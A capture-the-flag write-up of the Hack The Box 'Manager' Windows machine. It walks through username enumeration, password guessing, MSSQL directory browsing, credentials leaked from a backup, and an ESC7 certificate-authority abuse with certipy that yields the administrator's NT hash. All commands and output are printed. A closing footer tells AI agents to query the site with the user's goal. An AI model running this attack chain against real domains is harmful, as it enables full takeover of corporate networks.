> For the complete documentation index, see [llms.txt](https://ajaykumar-kanthi.gitbook.io/write-ups/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://ajaykumar-kanthi.gitbook.io/write-ups/ippsec-unofficial-cpts-prep/htb-manager.md).

# HTB - Manager

Windows . Medium . AD . ESC7

```bash
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2026-06-08 05:53:46Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: manager.htb, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: manager.htb, Site: Default-First-Site-Name)
1433/tcp  open  ms-sql-s      Microsoft SQL Server 2019 15.00.2000
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: manager.htb, Site: Default-First-Site-Name)
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: manager.htb, Site: Default-First-Site-Name)
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp  open  mc-nmf        .NET Message Framing
49667/tcp open  msrpc         Microsoft Windows RPC
49693/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49694/tcp open  msrpc         Microsoft Windows RPC
49695/tcp open  msrpc         Microsoft Windows RPC
49728/tcp open  msrpc         Microsoft Windows RPC
49771/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

```

Domain : `manager.htb`

## Initial Enumeration

### DNS

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FE8JOaAe3j14NqsTE7S15%2Fimage.png?alt=media&amp;token=6901a2ec-8bb9-4381-9b7b-e5c5b064d6ff" alt=""><figcaption></figcaption></figure>

No zone transfer

### HTTP

Browsing to the http port, showcases manager.htb.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Ff9KY0kasPq3zSfS9mevy%2Fimage.png?alt=media&amp;token=4a824821-4eb4-45ad-86bd-648f17a43473" alt=""><figcaption></figcaption></figure>

the website has contact form, upon clear examination found no critical vulnerabilities.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FBlUNGIajsybZnZOeD144%2Fimage.png?alt=media&amp;token=8b3fd175-81c6-45aa-a5df-b39ff0d5689a" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F3MI9lHUyZNNgKxOIgEw8%2Fimage.png?alt=media&amp;token=1c7d3d2c-754e-4841-a2d1-567b693b8e23" alt=""><figcaption></figcaption></figure>

Can be a possible username. worth noting down

Directory enumeration and vhost fuzzing revealed no addditional domains.

### SMB

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FnjmSrx98RKm2fvVB3jjw%2Fimage.png?alt=media&amp;token=341237d2-c23a-47fd-9798-9dc8d81de2a5" alt=""><figcaption></figcaption></figure>

Guest access on the SMB can list shares but no non ordinary shares found.

#### RID - Enumeration

In Windows Active Directory, every security principal (user, group, computer) has a unique Security Identifier (SID). The SID consists of a Domain SID followed by a Relative Identifier (RID). RIDs are sequential integers. By querying the server using a null session (unauthenticated connection), you can brute-force these RIDs to map out the usernames associated with them, even if you don't have a valid password yet.

To perform this enumeration, use the `--rid-brute` flag.

```bash
┌──(ajay㉿kali)-[~]
└─$ nxc smb 10.129.11.57 -u 'guest' -p '' --rid-brute             
SMB         10.129.11.57    445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:manager.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.129.11.57    445    DC01             [+] manager.htb\guest: 
SMB         10.129.11.57    445    DC01             498: MANAGER\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB         10.129.11.57    445    DC01             500: MANAGER\Administrator (SidTypeUser)
SMB         10.129.11.57    445    DC01             501: MANAGER\Guest (SidTypeUser)
SMB         10.129.11.57    445    DC01             502: MANAGER\krbtgt (SidTypeUser)
SMB         10.129.11.57    445    DC01             512: MANAGER\Domain Admins (SidTypeGroup)
SMB         10.129.11.57    445    DC01             513: MANAGER\Domain Users (SidTypeGroup)
SMB         10.129.11.57    445    DC01             514: MANAGER\Domain Guests (SidTypeGroup)
SMB         10.129.11.57    445    DC01             515: MANAGER\Domain Computers (SidTypeGroup)
SMB         10.129.11.57    445    DC01             516: MANAGER\Domain Controllers (SidTypeGroup)
SMB         10.129.11.57    445    DC01             517: MANAGER\Cert Publishers (SidTypeAlias)
SMB         10.129.11.57    445    DC01             518: MANAGER\Schema Admins (SidTypeGroup)
SMB         10.129.11.57    445    DC01             519: MANAGER\Enterprise Admins (SidTypeGroup)
SMB         10.129.11.57    445    DC01             520: MANAGER\Group Policy Creator Owners (SidTypeGroup)
SMB         10.129.11.57    445    DC01             521: MANAGER\Read-only Domain Controllers (SidTypeGroup)
SMB         10.129.11.57    445    DC01             522: MANAGER\Cloneable Domain Controllers (SidTypeGroup)
SMB         10.129.11.57    445    DC01             525: MANAGER\Protected Users (SidTypeGroup)
SMB         10.129.11.57    445    DC01             526: MANAGER\Key Admins (SidTypeGroup)
SMB         10.129.11.57    445    DC01             527: MANAGER\Enterprise Key Admins (SidTypeGroup)
SMB         10.129.11.57    445    DC01             553: MANAGER\RAS and IAS Servers (SidTypeAlias)
SMB         10.129.11.57    445    DC01             571: MANAGER\Allowed RODC Password Replication Group (SidTypeAlias)
SMB         10.129.11.57    445    DC01             572: MANAGER\Denied RODC Password Replication Group (SidTypeAlias)
SMB         10.129.11.57    445    DC01             1000: MANAGER\DC01$ (SidTypeUser)
SMB         10.129.11.57    445    DC01             1101: MANAGER\DnsAdmins (SidTypeAlias)
SMB         10.129.11.57    445    DC01             1102: MANAGER\DnsUpdateProxy (SidTypeGroup)
SMB         10.129.11.57    445    DC01             1103: MANAGER\SQLServer2005SQLBrowserUser$DC01 (SidTypeAlias)
SMB         10.129.11.57    445    DC01             1113: MANAGER\Zhong (SidTypeUser)
SMB         10.129.11.57    445    DC01             1114: MANAGER\Cheng (SidTypeUser)
SMB         10.129.11.57    445    DC01             1115: MANAGER\Ryan (SidTypeUser)
SMB         10.129.11.57    445    DC01             1116: MANAGER\Raven (SidTypeUser)
SMB         10.129.11.57    445    DC01             1117: MANAGER\JinWoo (SidTypeUser)
SMB         10.129.11.57    445    DC01             1118: MANAGER\ChinHae (SidTypeUser)
SMB         10.129.11.57    445    DC01             1119: MANAGER\Operator (SidTypeUser)
```

The usernames can be extracted to a file can be validated using kerbrute.

```bash
└─$ ./kerbrute_linux_amd64 userenum -d manager.htb --dc 10.129.11.57 ~/user.txt

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 06/07/26 - Ronnie Flathers @ropnop

2026/06/07 19:07:49 >  Using KDC(s):
2026/06/07 19:07:49 >   10.129.11.57:88

2026/06/07 19:07:49 >  [+] VALID USERNAME:       ChinHae@manager.htb
2026/06/07 19:07:49 >  [+] VALID USERNAME:       Operator@manager.htb
2026/06/07 19:07:49 >  [+] VALID USERNAME:       Cheng@manager.htb
2026/06/07 19:07:49 >  [+] VALID USERNAME:       Raven@manager.htb
2026/06/07 19:07:49 >  [+] VALID USERNAME:       JinWoo@manager.htb
2026/06/07 19:07:49 >  [+] VALID USERNAME:       Zhong@manager.htb
2026/06/07 19:07:49 >  [+] VALID USERNAME:       Ryan@manager.htb
```

With valid usernames, the next thing we can try is a Asreproast attack, but no luck with that.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FPqg9HafuFFuAABNguC15%2Fimage.png?alt=media&amp;token=ab105af8-e5cc-460e-a4ff-208150daaacd" alt=""><figcaption></figcaption></figure>

With that said, i have no creds yet so on a random bases i ahve tried using the users name as there password to see if any user has set there username as password which is very common.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FiAZdl4ZbunU0LVNX6ZjG%2Fimage.png?alt=media&amp;token=9d35c2a7-7f03-44f4-9fa2-8a935036e98b" alt=""><figcaption></figcaption></figure>

When using small letters i got hit for three accounts and two of them where guest accounts.

I can use the operator account further my exploitation.

## Enumerating as Operator

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FsKJZxPwa3yPHFfDEsOq7%2Fimage.png?alt=media&amp;token=2b4920a4-eb50-4a85-a088-228c35691976" alt=""><figcaption></figcaption></figure>

Same here too no interesting shares

### Bloodhound

That said i can use the credentials to collect bloodhound loot and inspect further.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FyOOhVtmd7szrrC5FNCsv%2Fimage.png?alt=media&amp;token=25bd77bd-9039-48c8-978e-8d95b5cf1051" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F6GYs7x8zc3no0Yby7tRr%2Fimage.png?alt=media&amp;token=19eb16ff-0155-45e3-b3e2-bfbf77b024c1" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FZKkcpZsGzoQOrpCuNZts%2Fimage.png?alt=media&amp;token=7da799e2-1190-42f5-87c4-0af6297bec2b" alt=""><figcaption></figcaption></figure>

operator is not part of remote management so no shell but there is an mssql service running on the machine. we can check if the creds can give use access through that.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F11HF0HZ6RutiobhrChph%2Fimage.png?alt=media&amp;token=fdb97d43-88df-4d1d-b5dd-26852e96314b" alt=""><figcaption></figcaption></figure>

NXC confirms i can use aganist MSSQL.

### MSSQL

i can use `impacket-mssqlclient` to connect to the machine using the creds.

```bash
─(ajay㉿kali)-[~]
└─$ mssqlclient.py manager.htb/operator:operator@10.129.11.57 -windows-auth
Impacket v0.13.1 - Copyright Fortra, LLC and its affiliated companies 

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(DC01\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server 2019 RTM (15.0.2000)
[!] Press help for extra shell commands
SQL (MANAGER\Operator  guest@master)> 

```

```bash
SQL (MANAGER\Operator  guest@master)> enum_db
name     is_trustworthy_on   
------   -----------------   
master                   0   
tempdb                   0   
model                    0   
msdb                     1   
SQL (MANAGER\Operator  guest@master)> 
```

`is_trustworthy_on` (msdb = 1): This is the "Gold Mine." When a database has TRUSTWORTHY set to ON, it allows code execution within that database to potentially interact with server-level resources. If you can create a stored procedure in msdb that runs as a high-privileged user (like a database owner), you can often escape to the OS.

But our permissions in the `msdb` database are limited to `CONNECT` and viewing encryption key definitions. This means we do not have the permissions to create stored procedures or objects.

We can use `xp_dirtree` to list the files in c:/

```bash
SQL (MANAGER\Operator  guest@msdb)> xp_dirtree c:/
subdirectory                depth   file   
-------------------------   -----   ----   
$Recycle.Bin                    1      0   
Documents and Settings          1      0   
inetpub                         1      0   
PerfLogs                        1      0   
Program Files                   1      0   
Program Files (x86)             1      0   
ProgramData                     1      0   
Recovery                        1      0   
SQL2019                         1      0   
System Volume Information       1      0   
Users                           1      0   
Windows                         1      0   
SQL (MANAGER\Operator  guest@msdb)> 
```

There is a users directory in the C drive. Upon enumerating the drive i found raven user directory but couldnt find anything.

```bash
SQL (MANAGER\Operator  guest@msdb)> xp_dirtree c:/USers/
subdirectory    depth   file   
-------------   -----   ----   
Administrator       1      0   
All Users           1      0   
Default             1      0   
Default User        1      0   
Public              1      0   
Raven               1      0   
SQL (MANAGER\Operator  guest@msdb)> 

SQL (MANAGER\Operator  guest@msdb)> xp_dirtree c:/USers/Raven
subdirectory   depth   file   
------------   -----   ----   
SQL (MANAGER\Operator  guest@msdb)> 
```

Shifting to the web root directory found a backup archive file.

```bash
SQL (MANAGER\Operator  guest@msdb)> xp_dirtree c:/inetpub/wwwroot/
subdirectory                      depth   file   
-------------------------------   -----   ----   
about.html                            1      1   
contact.html                          1      1   
css                                   1      0   
images                                1      0   
index.html                            1      1   
js                                    1      0   
service.html                          1      1   
web.config                            1      1   
website-backup-27-07-23-old.zip       1      1   
SQL (MANAGER\Operator  guest@msdb)>
```

I can extract it using curl.

```bash
┌──(ajay㉿kali)-[~]
└─$ curl -O http://manager.htb/website-backup-27-07-23-old.zip
  % Total    % Received % Xferd  Average Speed  Time    Time    Time   Current
                                 Dload  Upload  Total   Spent   Left   Speed
100  0.99M 100  0.99M   0      0  1.84M      0                              0
                                                                              
```

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FXc84fco7OyULhZkKVFzt%2Fimage.png?alt=media&amp;token=d14de35f-4d89-41b9-ade9-03e687f76124" alt=""><figcaption></figcaption></figure>

The file interestingly contians an xml file which we can examine.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FQW5AJShG1BmyuYmgAlXw%2Fimage.png?alt=media&amp;token=1cfed121-2341-4d98-a1d2-087cd23c4e36" alt=""><figcaption></figcaption></figure>

The xml file therein leaked the credentials for raven user which can be validated using nxc.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FZZ7LTLsmCdElVabsNcVh%2Fimage.png?alt=media&amp;token=11cbc4fd-33c5-4be2-b7ae-c3851316e0cf" alt=""><figcaption></figcaption></figure>

Looking at bloodhound raven is part of remote management so we have shell.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FdRHWUV3yIEQqhXELlgku%2Fimage.png?alt=media&amp;token=04f594a9-5124-44df-9c22-50ba80b9e426" alt=""><figcaption></figcaption></figure>

`raven : R4v3nBe5tD3veloP3r!123`

## Shell as Raven

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FbzNm6wuZoUJK8roKXYxX%2Fimage.png?alt=media&amp;token=55ff11e7-8d39-4134-9eda-86b64e79528b" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FsQCET9HVK8qURuOCVnsx%2Fimage.png?alt=media&amp;token=0434272f-2419-4ba9-96db-225ed052b888" alt=""><figcaption></figcaption></figure>

Nothing on bloodhound to exploit further too.

**T**here’s no other user directories, and the web directory doesn’t have anything else interesting to exploit furthur so i can use certifpy to find any vulnerable certificate templates.

### Vulnerable Certificate Templates

```bash
┌──(ajay㉿kali)-[~]
└─$ certipy find -u 'raven@manager.htb' -p 'R4v3nBe5tD3veloP3r!123' -dc-ip 10.129.11.57 -vulnerable -stdout 
Certipy v5.0.4 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 33 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 11 enabled certificate templates
[*] Finding issuance policies
[*] Found 13 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for 'manager-DC01-CA' via RRP
[*] Successfully retrieved CA configuration for 'manager-DC01-CA'
[*] Checking web enrollment for CA 'manager-DC01-CA' @ 'dc01.manager.htb'
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[*] Enumeration output:
Certificate Authorities
  0
    CA Name                             : manager-DC01-CA
    DNS Name                            : dc01.manager.htb
    Certificate Subject                 : CN=manager-DC01-CA, DC=manager, DC=htb
    Certificate Serial Number           : 5150CE6EC048749448C7390A52F264BB
    Certificate Validity Start          : 2023-07-27 10:21:05+00:00
    Certificate Validity End            : 2122-07-27 10:31:04+00:00
    Web Enrollment
      HTTP
        Enabled                         : False
      HTTPS
        Enabled                         : False
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Active Policy                       : CertificateAuthority_MicrosoftDefault.Policy
    Permissions
      Owner                             : MANAGER.HTB\Administrators
      Access Rights
        Enroll                          : MANAGER.HTB\Operator
                                          MANAGER.HTB\Authenticated Users
                                          MANAGER.HTB\Raven
        ManageCa                        : MANAGER.HTB\Administrators
                                          MANAGER.HTB\Domain Admins
                                          MANAGER.HTB\Enterprise Admins
                                          MANAGER.HTB\Raven
        ManageCertificates              : MANAGER.HTB\Administrators
                                          MANAGER.HTB\Domain Admins
                                          MANAGER.HTB\Enterprise Admins
    [+] User Enrollable Principals      : MANAGER.HTB\Authenticated Users
                                          MANAGER.HTB\Raven
    [+] User ACL Principals             : MANAGER.HTB\Raven
    [!] Vulnerabilities
      ESC7                              : User has dangerous permissions.
Certificate Templates                   : [!] Could not find any certificate templates

```

Found ESC7 vulnerability.

### Exploiting ESC7&#x20;

ESC7 occurs when a user has **`ManageCA`** or **`ManageCertificates`** permissions on the Certificate Authority (CA). Even if you don't have a specific vulnerable template, these permissions allow you to perform administrative actions on the CA itself.

Specifically, with `ManageCA` rights, you can:

1. **Enable the SubCA template** (if it's disabled) and enroll in it, or
2. **Force the issuance of pending certificate requests**, which allows you to bypass approval workflows.

**Step 1: Enable the SubCA Template**

```bash
──(ajay㉿kali)-[~]
└─$ certipy ca -u 'raven@manager.htb' -p 'R4v3nBe5tD3veloP3r!123' \
  -dc-ip 10.129.11.57 -ca 'manager-DC01-CA' \
  -enable-template SubCA
Certipy v5.0.4 - by Oliver Lyak (ly4k)

[*] Successfully enabled 'SubCA' on 'manager-DC01-CA'

```

**Step 2: Request a Certificate for Administrator (will fail but saves the key) This will fail with "`CERTSRV_E_TEMPLATE_DENIED`" but saves a `.key file` and gives you a Request ID.**

```bash
┌──(ajay㉿kali)-[~]
└─$ certipy req -u 'raven@manager.htb' -p 'R4v3nBe5tD3veloP3r!123' \
  -dc-ip 10.129.11.57 -ca 'manager-DC01-CA' \
  -template SubCA -upn 'administrator@manager.htb'
Certipy v5.0.4 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Request ID is 19
[-] Got error while requesting certificate: code: 0x80094012 - CERTSRV_E_TEMPLATE_DENIED - The permissions on the certificate template do not allow the current user to enroll for this type of certificate.
Would you like to save the private key? (y/N): y
[*] Saving private key to '19.key'
[*] Wrote private key to '19.key'
[-] Failed to request certificate
```

**Step 3: First add yourself as an officer to get ManageCertificates:**

```bash
─(ajay㉿kali)-[~]
└─$ certipy ca -u 'raven@manager.htb' -p 'R4v3nBe5tD3veloP3r!123' \
  -dc-ip 10.129.11.57 -ca 'manager-DC01-CA' \
  -add-officer raven
Certipy v5.0.4 - by Oliver Lyak (ly4k)

[*] Successfully added officer 'Raven' on 'manager-DC01-CA'
```

**Step 4: Issue the Request**

```bash
┌──(ajay㉿kali)-[~]
└─$ certipy ca -u 'raven@manager.htb' -p 'R4v3nBe5tD3veloP3r!123' \
  -dc-ip 10.129.11.57 -ca 'manager-DC01-CA' \
  -issue-request 19
Certipy v5.0.4 - by Oliver Lyak (ly4k)

[*] Successfully issued certificate request ID 19
```

**Step 5: Retrieve the Certificate**

```bash
┌──(ajay㉿kali)-[~]
└─$ certipy req -u 'raven@manager.htb' -p 'R4v3nBe5tD3veloP3r!123' \
  -dc-ip 10.129.11.57 -ca 'manager-DC01-CA' \
  -retrieve 19
Certipy v5.0.4 - by Oliver Lyak (ly4k)

[*] Retrieving certificate with ID 19
[*] Successfully retrieved certificate
[*] Got certificate with UPN 'administrator@manager.htb'
[*] Certificate has no object SID
[*] Loaded private key from '19.key'
[*] Saving certificate and private key to 'administrator.pfx'
[*] Wrote certificate and private key to 'administrator.pfx'
```

**Step 6: Get the NT Hash**

**Got a clock skew error first so need to sync with AD when working on AD**

```bash
─$ sudo ntpdate 10.129.11.57              
[sudo] password for ajay: 
2026-06-08 03:15:04.157621 (-0400) +25197.403023 +/- 0.022100 10.129.11.57 s1 no-leap
CLOCK: time stepped by 25197.403023
```

```bash
┌──(ajay㉿kali)-[~]
└─$ certipy auth -pfx administrator.pfx -dc-ip 10.129.11.57
Certipy v5.0.4 - by Oliver Lyak (ly4k)

[*] Certificate identities:
[*]     SAN UPN: 'administrator@manager.htb'
[*] Using principal: 'administrator@manager.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'administrator.ccache'
[*] Wrote credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@manager.htb': aad3b435b51404eeaad3b435b51404ee:ae5064c2f62317332c88629e025924ef
```

We got the NT Hash for administrator.

## Shell as Administrator

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FOZGZqlpNt28pYMqlHQ5k%2Fimage.png?alt=media&amp;token=32177959-511c-497c-9849-8da86bf36b84" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F25b69U6KizUCcm4IdFwZ%2Fimage.png?alt=media&amp;token=30ec23ae-3ea3-4af3-bdcc-ce7ef11669c6" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the following URL with the `ask` and `goal` query parameters:

```
GET https://ajaykumar-kanthi.gitbook.io/write-ups/ippsec-unofficial-cpts-prep/htb-manager.md?ask=<question>&goal=<user_goal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is what the user is ultimately trying to achieve, the reason they need the answer. Sharing it helps GitBook give you a better, more relevant answer. A goal is most helpful when it describes the outcome the user wants rather than restating the question. For example, with `ask=how do I create an API token`, a goal like `build a script that syncs our docs to a CMS` lets GitBook tailor the answer to that use case.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
